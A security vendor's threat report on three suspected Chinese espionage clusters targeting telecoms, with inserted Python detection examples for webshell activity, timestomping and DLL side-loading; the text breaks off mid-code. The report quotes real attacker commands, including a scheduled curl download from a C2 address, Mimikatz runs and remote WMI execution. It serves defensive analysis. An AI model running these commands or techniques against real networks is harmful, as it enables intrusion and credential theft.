# DeadRinger: Exposing Chinese Threat Actors Targeting Major Telcos

cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

Written By Cybereason Nocturnus, August 3, 2021 | 27 minute read

Following the discovery of Hafnium attacks targeting Microsoft Exchange vulnerabilities, the [Cybereason Nocturnus](https://www.cybereason.com/blog/authors/cybereason-nocturnus) and Incident Response teams proactively hunted for various threat actors trying to leverage similar techniques in the wild. In the beginning of 2021, the Cybereason Nocturnus Team investigated clusters of intrusions targeting the telecommunications industry across Southeast Asia. During the investigation, three clusters of activity were identified, each showing significant connections to known threat actors, all suspected to be operating on behalf of Chinese state interests.

This report comes on the heels of the Biden administration's public rebuke of China's Ministry of State Security for the [recent HAFNIUM attacks](https://www.nytimes.com/2021/07/19/us/politics/microsoft-hacking-china-biden.html) that exploited vulnerabilities in unpatched Microsoft Exchange Servers and put thousands of organizations worldwide at risk. Exploitation of these same vulnerabilities was central to the success of the attacks detailed in this research.

Based on our analysis, we assess that the goal of the attackers behind these intrusions was to gain and maintain continuous access to telecommunication providers and to facilitate cyber espionage by collecting sensitive information, compromising high-profile business assets such as the billing servers that contain [Call Detail Record (CDR)](https://en.wikipedia.org/wiki/Call_detail_record#:~:text=A%20call%20detail%20record%20(CDR,through%20that%20facility%20or%20device.) data, as well as key network components such as the Domain Controllers, Web Servers and Microsoft Exchange servers.
_DeadRinger Overview Video_

- **Cluster A:** Assessed to be operated by [Soft Cell](https://attack.mitre.org/groups/G0093/), an activity group in operation since 2012, previously attacking Telcos in multiple regions including Southeast Asia, which was [first discovered by Cybereason in 2019](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers). We assess with a high level of confidence that the Soft Cell activity group is operating in the interest of China. The activity around this cluster started in 2018 and continued through Q1 2021.
- **Cluster B:** Assessed to be operated by the [Naikon APT](https://attack.mitre.org/groups/G0019/) threat actor, a highly active cyber espionage group in operation since 2010 which mainly targets ASEAN countries. The Naikon APT group was [previously attributed](https://cdn2.hubspot.net/hubfs/454298/Project_CAMERASHY_ThreatConnect_Copyright_2015.pdf) to the [Chinese People's Liberation Army's](https://en.wikipedia.org/wiki/People%27s_Liberation_Army) (PLA) Chengdu Military Region Second Technical Reconnaissance Bureau (Military Unit Cover Designator 78020). The activity around this cluster was first observed in Q4 2020 and continued through Q1 2021.
- **Cluster C:** A "mini-cluster" characterized by a unique OWA backdoor that was deployed across multiple Microsoft Exchange and IIS servers. Analysis of the backdoor shows significant code similarities with a previously documented backdoor observed being used in the operation dubbed [Iron Tiger](http://www.erai.com/CustomUploads/ca/wp/2015_12_wp_operation_iron_tiger.pdf), which was attributed to a Chinese threat actor tracked by various researchers as Group-3390 (APT27 / Emissary Panda). The activity around this cluster was observed between 2017 and Q1 2021.
_The correlation between the three clusters_

It is noteworthy that the Cybereason Nocturnus Team also observed an interesting overlap among the three clusters: in some instances, all three clusters of activity were observed in the same target environment, around the same timeframe, and even on the same endpoints. At this point, there is not enough information to determine with certainty the nature of this overlap, namely whether these clusters represent the work of three different threat actors working independently, or the work of three different teams operating on behalf of a single threat actor. Regardless, we do offer several plausible hypotheses that might account for this observation. We hope that the information provided in this report will assist in shedding light on further related intrusions, and that as time goes by more information will be made available with regard to the connection between the clusters, the suspected threat actors, and the relationship between them.

## Deadringer: Key Findings

- **Adaptive, Persistent and Evasive:** Highly adaptive attackers worked diligently to obscure their activity and maintain persistence on the infected systems, dynamically responding to mitigation attempts after having evaded security efforts since at least 2017, an indication that the targets are of great value to the attackers.
- **Microsoft Exchange Vulnerabilities Exploited:** Similar to the HAFNIUM attacks, the threat actors exploited recently disclosed vulnerabilities in Microsoft Exchange Servers to gain access to the targeted networks. They then proceeded to compromise critical network assets such as Domain Controllers (DC) and billing systems which contain highly sensitive information like Call Detail Record (CDR) data, allowing them access to the sensitive communications of anyone using the affected telecoms' services.
- **High Value Espionage Targets:** Based on previous findings from the [Operation Soft Cell report](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers) Cybereason published in 2019, as well as other published analysis of operations conducted by these threat actors, it is assessed that the telecoms were compromised in order to facilitate espionage against select targets. These targets are likely to include corporations, political figures, government officials, law enforcement agencies, political activists and dissident factions of interest to the Chinese government.
- **Operating in the Interest of China:** Three distinct clusters of attacks have varying degrees of connection to the APT groups Soft Cell, Naikon and Group-3390, all known to operate in the interest of the Chinese government. Overlaps in attacker TTPs across the clusters are evidence of a likely connection between the threat actors, supporting the assessment that each group was tasked with parallel objectives in monitoring the communications of specific high value targets under the direction of a centralized coordinating body aligned with Chinese state interests.

## Acknowledgements

Research papers such as this one require collaboration and vigilance from multiple groups within the company. While the bulk of the report was produced by Cybereason Nocturnus researchers Lior Rochberger, Tom Fakterman, Daniel Frank and Assaf Dahan, this research would not have been possible without the tireless effort, analysis, attention to detail and contribution of the Cybereason Incident Response and Security Operations teams.
Special thanks and appreciation go to Matt Hart, Akihiro Tomita, Yusuke Shimizu, Fusao Tanida, Niv Yona, Eli Salem, Ilan Sokolovsky, and Omer Yampel.

[We invite you to join us for a webinar](https://www.cybereason.com/deadringer-exposing-chinese-threat-actors-targeting-major-telcos) on Thursday, August 12th, at 1:00 PM ET / 10:00 AM PT where Cybereason's Head of Threat Research Assaf Dahan and VP of Security Practices Mor Levi will walk through the espionage operations uncovered in the DeadRinger report.

### Table of Contents

- Executive Summary
- Key Findings
- Cluster A: Suspected Soft Cell Activity (2018-2021+)
  - Phase 1: Key Detected Activity
  - Phase 2: Significant Changes in TTPs
  - Phase 3: Significant Changes in TTPs
  - Phase 4: Significant Changes in TTPs
  - Similarities to Operation Soft Cell
- Cluster B: Suspected Naikon APT Activity
  - Maintaining Foothold: The Nebulae Backdoor
  - Living Off the Land - Using Built-In Windows Tools
  - Lateral Movement: PAExec
  - Lateral Movement: WMI and Net use
  - Credential Theft: Mimikatz
  - Credential Theft: EnrollLoger Keylogger
- Cluster C: OWA Backdoor Activity (Mini-Cluster)
  - Custom OWA Backdoor - Core Functionality
  - Similarities with Iron Tiger OWA Backdoors
  - Connections to Winnti's Tools and Infrastructure
- Possible Connection Between Tropic Trooper and Soft Cell
- Attributing Clusters A, B and C
- A Note on CTI Attribution
- Conclusion
- MITRE ATT&CK BREAKDOWN (Cluster A - Soft Cell Activity)
- MITRE ATT&CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity)
- MITRE ATT&CK BREAKDOWN (Cluster C - Custom OWA Backdoor)

### Cluster A: Suspected Soft Cell Activity (2018-2021+)

Following up on Cybereason's [discovery of the Soft Cell activity group in 2019](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers), the Nocturnus Team continued to track the group's activity and related breaches, which led us to find evidence that the group continued its operation, targeting Telcos in
various regions, especially in Southeast Asian countries, all the way to mid-2021. Similar to our 2019 report, the attackers practiced the "Low and Slow" approach, allowing them to maintain access and conduct their activity clandestinely without alerting the end users or the security teams.

Based on our investigation, this cluster consisted of four main phases, with the earliest signs of intrusion going back to 2018. Each phase of the operation demonstrates the attackers' adaptiveness in how they responded to various mitigation efforts, changing infrastructure, toolsets, and techniques while attempting to become more stealthy. Though the attackers did change some of their tools and techniques since their exposure, their core modus operandi and tools still seem to be in line with our previous findings.

From the telemetry and forensic evidence available to us, it appears that the attackers gained initial access to the network by exploiting several vulnerabilities in Microsoft Exchange servers, including the [recent set of vulnerabilities published by Microsoft in March 2021](https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/). It is noteworthy that the attackers appear to have exploited the recent Microsoft Exchange vulnerabilities long before they became publicly known:

_Timeline of the attack - Cluster A_

### Phase 1: Key Detected Activity

Each phase starts with the exploitation of several Microsoft Exchange server vulnerabilities which grant the attackers an initial foothold on the targeted network, ultimately allowing them to compromise additional assets.
Following the exploitation, the attackers installed the China Chopper WebShell on the compromised server and used it to perform a variety of tasks at each phase. In the first phase the attackers mainly focused on reconnaissance activity, mapping out the network and identifying critical assets. In addition, they deployed other tools that allowed them to harvest credentials, move laterally in the network, and exfiltrate data:

_China Chopper WebShell activity as seen in the Cybereason Defense Platform_

It is interesting to note that initially the attackers [staged many of their tools in the $RECYCLE.BIN folder](https://attack.mitre.org/techniques/T1074/), in an attempt to hide them from users and potentially avoid automatic detection by certain security tools. The exact same technique was also documented by Cybereason in our 2019 report [Operation Soft Cell](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers):

### Reconnaissance

During the reconnaissance phase, the attackers used various built-in Windows tools such as [net](https://attack.mitre.org/software/S0039/), [query](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/query-process), [whoami](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami), [tasklist](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist), [hostname](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname), and [ping](https://attack.mitre.org/software/S0097/) for internal and external connectivity checks:

_Reconnaissance commands executed via China Chopper WebShell_

In addition, the attackers used different scripts for reconnaissance.
For example, one of the scripts is called "test.bat" and was used to execute [PortQry](https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/portqry-exe-command-line-utility), a command-line utility that helps troubleshoot TCP/IP connectivity issues by reporting the status of TCP and UDP ports on a remote machine, which can also be used for [Active Directory reconnaissance](https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/use-portqry-verify-active-directory-tcp-ip-connectivity). The binary itself was renamed to "psc.exe" by the attacker, probably in an attempt to avoid detection.

The second script found was psloglist.bat, which runs Microsoft's Sysinternals [PsLogList](https://docs.microsoft.com/en-us/sysinternals/downloads/psloglist) tool and saves the Security event log entries from the last 10 days:

_The content of psloglist.bat_

### Credential theft

Throughout the operation, the attackers used various tools and techniques to harvest credentials. The most common tool they used is the notorious [Mimikatz](https://attack.mitre.org/software/S0002/). In the first phase, the attackers used the well-known PowerShell Empire Invoke-Mimikatz script, which was stored in the same directory as the WebShell itself:

_Malware alert for nm.sp1 - PowerShell Empire Invoke-Mimikatz script_

The credentials were sent back to the attackers and were used for lateral movement and privilege escalation.

### Lateral Movement

The attackers used different methods and tools to move laterally to different endpoints on the network, such as Cobalt Strike implants, [WMI](https://attack.mitre.org/techniques/T1047/) and Net Use.

### WMI and Net Use

The attackers used the command "net use" to configure connections to shared resources on the network, and to copy their tools to different systems.
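The Phase 1 activity described so far (WebShell-spawned reconnaissance, tools staged in $RECYCLE.BIN, and legitimate utilities renamed on disk such as PortQry as psc.exe) is the kind of pattern a detection engineer turns into rules. The following is an added example, not code from the report or from Cybereason: a small rule set run over constructed process-creation events. The event fields (Image, ParentImage, CommandLine, OriginalFileName) follow Sysmon Event ID 1 and are an assumption about the telemetry source; the sample events are invented for the example, and the `echo [S]&cd&echo [E]` marker rule draws on the command lines quoted in the Soft Cell similarities table later in this section.

```python
"""Added example, not code from the Cybereason report: a rule set that flags the
Phase 1 tradecraft in process-creation telemetry. The event shape (Image,
ParentImage, CommandLine, OriginalFileName) mirrors Sysmon Event ID 1 and is an
assumption about the telemetry source; the sample events are constructed."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str                    # full path of the new process
    parent_image: str             # full path of the parent
    command_line: str
    original_file_name: str = ""  # PE version-resource name; survives a rename on disk


# Built-in tools the report lists as used for reconnaissance through the WebShell.
RECON_TOOLS = {"net", "net1", "query", "whoami", "tasklist", "hostname", "ping",
               "systeminfo", "netstat", "dsget", "quser"}

# Locations the report describes as attacker staging directories.
STAGING_DIRS = ("$recycle.bin\\", "\\perflogs\\", "\\users\\support_388945a0\\")

# Legitimate tools the attackers renamed (psc.exe, smnbt.exe, ...). Matching on
# OriginalFileName assumes that field is collected; the names are the tools' own.
KNOWN_TOOLS = {"portqry.exe", "psloglist.exe", "nbtscan.exe", "lg.exe"}


def basename(path: str) -> str:
    return path.strip('"\'').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def first_executables(command_line: str):
    """Yield the program that starts each '&', '|' or ';' separated sub-command,
    skipping an outer 'cmd /c' or 'cmd /k' wrapper and a trailing '.exe'."""
    for part in re.split(r"[&|;]+", command_line):
        toks = [t.strip('"\'') for t in part.split()]
        while toks and (basename(toks[0]) in ("cmd", "cmd.exe") or toks[0].lower() in ("/c", "/k")):
            toks.pop(0)
        if toks:
            name = basename(toks[0])
            yield name[:-4] if name.endswith(".exe") else name


def evaluate(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list = benign)."""
    hits = []
    image = basename(ev.image)
    cmd = ev.command_line.lower()

    # Rule 1: the IIS worker (host of the WebShell) spawning a shell; escalate when
    # that shell runs one of the reconnaissance commands.
    if basename(ev.parent_image) == "w3wp.exe" and image in ("cmd.exe", "powershell.exe"):
        hits.append("webshell_spawned_shell")
        if any(name in RECON_TOOLS for name in first_executables(ev.command_line)):
            hits.append("webshell_recon_command")

    # Rule 2: the "echo [S]&cd&echo [E]" bracketing China Chopper appends so it can
    # locate command output in the HTTP response.
    if "echo [s]" in cmd and "echo [e]" in cmd:
        hits.append("china_chopper_output_markers")

    # Rule 3: anything executing from, or referencing, a staging directory.
    if any(d in ev.image.lower() or d in cmd for d in STAGING_DIRS):
        hits.append("staging_directory_use")

    # Rule 4: a known tool whose on-disk name no longer matches its original name.
    orig = ev.original_file_name.lower()
    if orig in KNOWN_TOOLS and orig != image:
        hits.append(f"renamed_tool:{orig}->{image}")

    return hits


SAMPLE_EVENTS = [  # constructed for this example, not incident data
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r'cmd /c cd /d C:\inetpub\wwwroot\&whoami&net group "domain admins" /domain&echo [S]&cd&echo [E]'),
    ProcEvent(r"C:\$Recycle.Bin\psc.exe", r"C:\Windows\System32\cmd.exe",
              r"C:\$Recycle.Bin\psc.exe -n dc01 -e 389", original_file_name="PortQry.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]


def scan(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each flagged event's image path to its rule hits."""
    return {ev.image: hits for ev in events if (hits := evaluate(ev))}


if __name__ == "__main__":
    for image, hits in scan().items():
        print(f"{image}: {', '.join(hits)}")
```

The OriginalFileName rule works because renaming a file does not touch the PE version resource; an attacker who strips the resource or recompiles the tool defeats it, which is where hash lists and import-hash matching take over. Rule 1 is deliberately two-tiered: any shell under w3wp.exe on an Exchange server is worth a look, and a recon command in it is worth an alert.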
After the tools were copied, the attackers were able to execute them remotely using WMI and by creating scheduled tasks remotely to run them:

_Net Use commands as seen in the Cybereason Defense Platform_

_Creation of remote scheduled tasks_

_Executing scripts remotely using WMI_

### Data Exfiltration

In an attempt to hide the contents of the stolen data, the threat actors [compressed and password-protected the data using the WinRAR tool](https://attack.mitre.org/techniques/T1560/). The RAR files were then placed in the C:\users\SUPPORT_388945a0\Documents folder. This folder belongs to a built-in user account (SUPPORT_388945a0) that is used for the Help and Support service; it is disabled by default but was purposefully enabled by the attacker. The data was then exfiltrated using the China Chopper WebShell. It is also interesting to mention that the nefarious use of this specific account (SUPPORT_388945a0) was previously seen with the Chinese APT3 and the [Iranian Leafminer threat actors](https://gist.github.com/MSAdministrator/7a61025263e279a740835da4b205e6d0):

_Evidence of archived collected data using China Chopper_

Knowing what data the attackers tried to exfiltrate can sometimes shed light on the attackers' motivations. In our previous report about Soft Cell, we were able to determine that the attackers exfiltrated CDR data from telecommunication providers in order to facilitate cyber espionage against specific individuals.

### Maintaining Foothold: PcShare Backdoor

Aside from the China Chopper WebShell, the attackers relied heavily on a known backdoor named [PcShare](https://github.com/LiveMirror/pcshare), whose code is publicly available and which was reported as being [mostly used by Chinese threat actors attacking Southeast Asian countries](https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware). PcShare has the following capabilities:

- Controlling the file system
- Manipulation of system services
- Uploading and downloading files
- Process manipulation
- Manipulating the Windows Registry
- Executing arbitrary commands using the Windows CMD shell
- Rebooting/shutting down the system
- Displaying message boxes to the user

PcShare was executed via a loader DLL (NvSmartMax.dll) and a payload (NvSmartMax.dat), attempting to masquerade as a legitimate NVIDIA module named "NvSmartMax.dll", the "NVIDIA Smart Maximise Helper Host" application (part of the NVIDIA GPU graphics driver). In most cases, the attackers used the legitimate nvSmartEx.exe to [side-load](https://attack.mitre.org/techniques/T1574/002/) the loader DLL ("NvSmartMax.dll"). The loader then decrypts the PcShare core payload ("NvSmartMax.dat") placed in the same directory. Interestingly, the payload .dat file used during this attack has the exact same hash mentioned in a [report by BlackBerry from 2019](https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware), detailing the same execution technique used to stealthily load PcShare into memory.
Cybereason observed that in addition to what was reported by BlackBerry, the NvSmartMax.dll was also executed directly via rundll32.exe in certain instances:

_PcShare execution graph_

The execution of the backdoor on the remote machine revealed additional activities performed by the attackers, including:

- Reconnaissance activity to collect information about the endpoint and network
- Searching for security tools and attempting to disable or kill their processes
- Creating two scheduled tasks for the Cobalt Strike loader: Microsoft\Windows\Wininet\Config and Microsoft\Windows\WindowsColorSystem\Config
- Using PowerShell to alter the creation time of the Cobalt Strike loader and payload files, a technique called [timestomping](https://attack.mitre.org/techniques/T1070/006/), which is used for detection evasion
- Executing the Cobalt Strike loader

_The execution of the PcShare backdoor as seen in the Cybereason Defense Platform_

### PcShare Continuously in Use Since 2018

Our investigation revealed that the attackers were operating in the target network for at least two and a half years before Cybereason was deployed in the environment. One piece of evidence that the attackers were present in the network from 2018 is the creation time of the PcShare binary:

_Creation time of the PcShare backdoor as seen in the Cybereason Defense Platform_

Another piece of evidence that supports the assessment that the attackers were inside the network since 2018 is that the same IP address that was hard-coded inside the PcShare backdoor mentioned above was also used in a scheduled task.
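The report dates the intrusion from the PcShare binary's creation time while also noting that the same actors timestomped their Cobalt Strike files with PowerShell, so it is worth being explicit about when a creation timestamp counts as evidence. PowerShell's CreationTime setter (and SetFileTime underneath it) only rewrites the $STANDARD_INFORMATION timestamps; NTFS keeps a second set in the $FILE_NAME attribute that user-mode code cannot set directly, and comparing the two is the standard check. The following is an added example, not code from the report or from Cybereason; the MFT records are constructed (the loader.dll path is invented), and in practice the two timestamp sets come from an MFT parser such as MFTECmd.

```python
"""Added example, not from the Cybereason report: decide whether an NTFS creation
time can be cited as evidence by comparing the $STANDARD_INFORMATION ($SI) value
with the kernel-maintained $FILE_NAME ($FN) value. Records are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

TICKS_PER_SECOND = 10_000_000                       # FILETIME is 100 ns ticks
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt: datetime, extra_ticks: int = 0) -> int:
    """UTC datetime -> FILETIME. extra_ticks supplies the sub-microsecond part that
    real NTFS timestamps carry; used here only to build the constructed records."""
    return (dt - EPOCH_1601) // timedelta(microseconds=1) * 10 + extra_ticks


def from_filetime(ticks: int) -> datetime:
    return EPOCH_1601 + timedelta(microseconds=ticks // 10)


@dataclass
class MftRecord:
    path: str
    si_created: int   # $SI: what dir, Get-Item and EDR consoles display; settable
    fn_created: int   # $FN: written by the kernel on create/rename; no user-mode API


def timestomp_indicators(rec: MftRecord) -> list[str]:
    found = []
    # 1. $SI created earlier than $FN created cannot arise from normal file
    #    operations; the $SI value was moved backwards after the file got its name.
    if rec.si_created < rec.fn_created:
        found.append("si_created_before_fn_created")
    # 2. Whole-second precision in $SI while $FN keeps a 100 ns fraction: typical of a
    #    value written by a script (a PowerShell DateTime literal has no sub-second
    #    part). Not conclusive alone: archive extraction and FAT media also yield
    #    coarse timestamps.
    if rec.si_created % TICKS_PER_SECOND == 0 and rec.fn_created % TICKS_PER_SECOND != 0:
        found.append("si_whole_second_precision")
    return found


def evidential_creation_time(rec: MftRecord) -> datetime:
    """The creation time safe to cite: $SI when nothing is suspicious, otherwise $FN,
    the moment this directory entry was written (the file existed at least since then)."""
    ticks = rec.fn_created if timestomp_indicators(rec) else rec.si_created
    return from_filetime(ticks)


SAMPLE_RECORDS = [  # constructed; real values come from an MFT parser
    MftRecord(r"C:\$Recycle.Bin\NvSmartMax.dll",
              si_created=to_filetime(datetime(2018, 6, 12, 9, 14, 27, 123456, tzinfo=timezone.utc), 7),
              fn_created=to_filetime(datetime(2018, 6, 12, 9, 14, 27, 123456, tzinfo=timezone.utc), 7)),
    MftRecord(r"C:\Windows\Temp\loader.dll",   # hypothetical stomped loader
              si_created=to_filetime(datetime(2015, 3, 1, tzinfo=timezone.utc)),
              fn_created=to_filetime(datetime(2021, 2, 18, 3, 41, 9, 555012, tzinfo=timezone.utc), 3)),
]


def report(records=SAMPLE_RECORDS) -> dict[str, tuple[list[str], str]]:
    """path -> (indicators, creation time you may cite, ISO 8601)."""
    return {r.path: (timestomp_indicators(r), evidential_creation_time(r).isoformat())
            for r in records}


if __name__ == "__main__":
    for path, (flags, when) in report().items():
        print(f"{path}: {when} {'SUSPECT ' + ','.join(flags) if flags else 'consistent'}")
```

An attacker who stomps the file and then moves or renames it, or who writes the MFT directly, can make the two sets agree, so treat a clean result as "not contradicted" rather than proven, and corroborate important dates with $UsnJrnl, $LogFile and Prefetch.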
That scheduled task used the curl.exe binary to download a payload (a CAB file that contains the file "nvSmartEx.exe") from the mentioned C2 and save it in the recycle.bin folder:

_Scheduled task - [cmd.exe /c c:\$recycle.bin\curl.exe http://45.123.118[.]232/1.txt >c:\$recycle.bin\1.txt]_

_The same IP address, embedded inside the PcShare binary_

In addition to the scheduled task above, the attackers created another scheduled task with the same name (VV1) on other machines in the network. This task was different from the one above: it was used to execute a batch script located under c:\$recycle.bin\q.bat, also created by the attackers.

### Installing a VPN

In order to maintain persistence in the network and create an easy access point into it, the attackers installed [SoftEther VPN](https://www.softether.org/), which they renamed to "oracll.exe" in order to evade detection. SoftEther helps disguise the traffic as benign on the target network. The same VPN client was [previously observed in attacks involving the Soft Cell activity group](https://attack.mitre.org/groups/G0093/):

_Renamed SoftEther VPN binary_

### Phase 2: Changes in TTPs

In addition to the activities performed in the first phase, such as reconnaissance activity or the use of PcShare and WMI, the attackers also used tools that were not used by them in the previous phase.

The attackers used a tool called [Local Group](https://www.joeware.net/freetools/tools/lg/index.htm), which is useful for adding and enumerating users in a domain, and a different Mimikatz, this time loaded using a DLL search order hijacking technique.

The attackers used the Local Group binary lg.exe with the command "-lu" that, [according to the usage guide](https://www.joeware.net/freetools/tools/lg/usage.htm), enumerates all local groups and members on a domain.
This was executed remotely on the DC server, and the output was saved into "1.txt":

_Executing lg.exe - local group, and saving the output to 1.txt_

As mentioned, the attackers used the DLL search order hijacking technique in order to load Mimikatz. To do so, the attackers replaced the legitimate DLL "mscorsvc.dll" and then executed the binary "mscorsvw.exe", which loads this DLL:

_Preparing the files for DLL search order hijacking of the malicious mscorsvc.dll_

From the activities observed, the DLL executed Mimikatz, performed [Pass-the-Hash](https://attack.mitre.org/techniques/T1550/002/) and credential dumping, and ran some reconnaissance commands using "net user":

_Execution of the mscorsvw.exe process with the malicious search order hijacked DLL, mscorsvc.dll_

### Phase 3: Changes in TTPs

The third phase shares similarities with the initial phases, yet has its own unique characteristics, namely the introduction of new tools that were not observed in the previous phases. Those tools include a script used for AD database dumping, [NBTScan](https://sectools.org/tool/nbtscan/), the [Dump Event Log tool](https://www.activexperts.com/admin/reskit/reskit2000/dumpel/), and again, a new Mimikatz executable.

The attackers ran a script named a.bat remotely on several DCs, which is used to dump the Active Directory database file (ntds.dit) using [NTDSUTIL's IFM creation](https://adsecurity.org/?p=2398) (VSS shadow copy):

_The creation, execution and deletion of a.bat_

_The execution of a.bat as seen in the Cybereason Defense Platform_

The attackers extended their reconnaissance activity in phase three by executing NBTScan (named smnbt.exe), which is used for scanning IP networks for NetBIOS name information, in addition to other native tools such as query.exe and dsget.exe:

_Execution of the WebShell as seen in the Cybereason Defense Platform_

As observed in the other phases, the attackers harvested credentials using Mimikatz, but this time it was an executable (.exe) file named s6.exe and 26.exe (both have the same hash). The process was executed both by the WebShell and by using WMI. The output was saved into files named "1.txt" and "log.log", and later sent to the attackers:

_Saving the output of Mimikatz to 1.txt and log.log_

### Phase 4: Changes in TTPs

The only addition observed in phase four compared to previous phases is that the attackers once again used a different Mimikatz executable, named d64.exe. It was found in two folders: c:\windows\d64.exe and c:\compaq\d64.exe:

_Prevention of d64.exe - Mimikatz_

### Similarities to Operation Soft Cell

During the investigation, there were significant similarities to the activity described in [Operation Soft Cell](https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers). Here are some of the similarities between the investigations:

| Category | Cluster A: Suspected Soft Cell Activity | Operation Soft Cell |
| --- | --- | --- |
| Naming convention | Tools saved under C:\PerfLogs\: C:\perflogs\s6.exe (Mimikatz), c:\perflogs\msnbt.exe (NBTScan), c:\perflogs\lg.exe (Local Group) | Tools saved under C:\PerfLogs\: C:\perflogs\pl6.exe (Mimikatz), C:\perflogs\nbt.exe (NBTScan), c:\perflogs\lg.exe (Local Group) |
| | Mimikatz execution: `"cmd" /c cd /d C:\PerfLogs\&s6.exe >1.txt&echo [S]&cd&echo [E]` | Mimikatz execution: `"cmd" /c cd /d C:\PerfLogs\&pl6.exe > 1.txt&echo [S]&cd&echo [E]` |
| | Running a script named "a.bat" remotely, using WMI: `wmic /node:[REDACTED] process call create a.bat&echo [S]&cd&echo [E]` | Running a script named "a.bat" remotely, using WMI: `wmic /node:[REDACTED] /user:"[REDACTED]" /password:"[REDACTED]" process call create a.bat&echo [S]&cd&echo [E]` |
| Shared tools used | Local Group (renamed "lg.exe" in both cases), PortQry (renamed "psc.exe" in both cases), SoftEther VPN (renamed in both cases), NBTScan (renamed in both cases), China Chopper WebShell, Cobalt Strike payloads, NET commands, Modified Mimikatz, WMI | Same tools in both investigations |
| Techniques / procedures | Exploiting the Exchange server every few months; changing IOCs between phases; hiding tools in the recycle.bin folder; use of the DLL search order hijacking technique; renaming binaries | Same techniques in both investigations |

In addition to the similarities observed among TTPs, there was another connection to the original Soft Cell report. In following the infrastructure of the Soft Cell activity group and analyzing their tools, one tool got our attention: [d64.exe](https://www.virustotal.com/gui/file/63adcd46ffd4c3b3959331723b6f97995731c5b299ec89ca7179fa7e708dc004/detection), the Mimikatz binary observed in phase 4. This file's PDB pattern is very similar to other tools observed in the Operation Soft Cell report and [related samples](https://github.com/yt0ng/cracking_softcell/blob/main/Cracking_SOFTCLL_TLP_WHITE.pdf):

| PDB path observed in d64.exe | PDB found in previous Soft Cell binaries |
| --- | --- |
| E:\vs_proj\mimkTools\dcsync_new\x64\dcsync64.pdb | E:\simplify_modify\x64\simplify.pdb |
| | E:\vs_proj\simplify_modify\Win32\simplify.pdb |

Pivoting from the files observed in the attack, other malicious files with the same PDB patterns ("E:\vs_proj\*" and "E:\simplify_modify\*") were found which could be part of the Soft Cell activity group arsenal. Please refer to Appendix A for further details.

### Cluster B: Suspected Naikon APT Activity

During our investigation, as more evidence was collected, Cybereason identified another cluster of activity targeting Telcos in ASEAN countries. This cluster exhibits rather unique TTPs compared to the ones detailed in Cluster A, namely the use of different tools and C2 server infrastructure. In addition, this cluster's activity was first observed in Q4 of 2020, while Cluster A goes back to 2018.

The main tool used in this cluster is the newly discovered Nebulae backdoor, which [according to Bitdefender](https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf) is attributed to the Naikon APT group. In addition, the attackers deployed a previously undocumented keylogger dubbed "EnrollLoger" on selected high-profile assets, most likely to obtain sensitive information and to harvest credentials of high-privilege user accounts.

As previously mentioned, while Cluster B has its unique characteristics that separate it from Cluster A, there were some overlaps observed in terms of the victimology, time frame, the endpoints and some generic tools that were also observed in Cluster A.
### Maintaining Foothold: The Nebulae Backdoor

One of the unique tools spotted in the course of the attack is the rare Nebulae backdoor, which was [first reported in April 2021](https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf) and attributed to the [Naikon group](https://malpedia.caad.fkie.fraunhofer.de/actor/naikon). The attackers evidently tried to evade detection by executing the backdoor in the context of legitimate and trusted applications that are vulnerable to [DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/).

For example, the attackers used the legitimate "chrome_frame_helper.exe", which is part of Google's [Google Chrome Frame](https://en.wikipedia.org/wiki/Google_Chrome_Frame), to load the fake module "chrome_frame_helper.dll", which contained the Nebulae backdoor payload:

_Nebulae Backdoor execution as seen in the Cybereason Defense Platform_

Once Cybereason blocked and quarantined "chrome_frame_helper.dll", the attackers immediately adapted by deploying the Nebulae backdoor via a new legitimate application that is vulnerable to [DLL Side-Loading](https://attack.mitre.org/techniques/T1574/002/). This time the attackers used "patchwrap.exe", a "Symantec Client Management Component", which loads the malicious module "atl110.dll".
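Both clusters reach the same result by the same mechanism: a signed, legitimate executable resolves a DLL name from its own directory and loads whatever the attacker put there (nvSmartEx.exe with NvSmartMax.dll and mscorsvw.exe with the replaced mscorsvc.dll in Cluster A; chrome_frame_helper.exe with chrome_frame_helper.dll and patchwrap.exe with atl110.dll here). The following is an added example, not code from the report or from Cybereason: triage of image-load events for that shape. Field names follow Sysmon Event ID 7 (Image, ImageLoaded, Signed, Signature) and are an assumption about the data source; the events and signer strings are constructed.

```python
"""Added example, not from the Cybereason report: flag DLL side-loading and
search-order hijacking in image-load telemetry. Event shape mirrors Sysmon Event
ID 7 (assumed data source); all events below are constructed."""
from dataclasses import dataclass

# Host/module pairs named in the report (lower-case) for exact-match alerting.
KNOWN_SIDELOAD_PAIRS = {
    ("nvsmartex.exe", "nvsmartmax.dll"),
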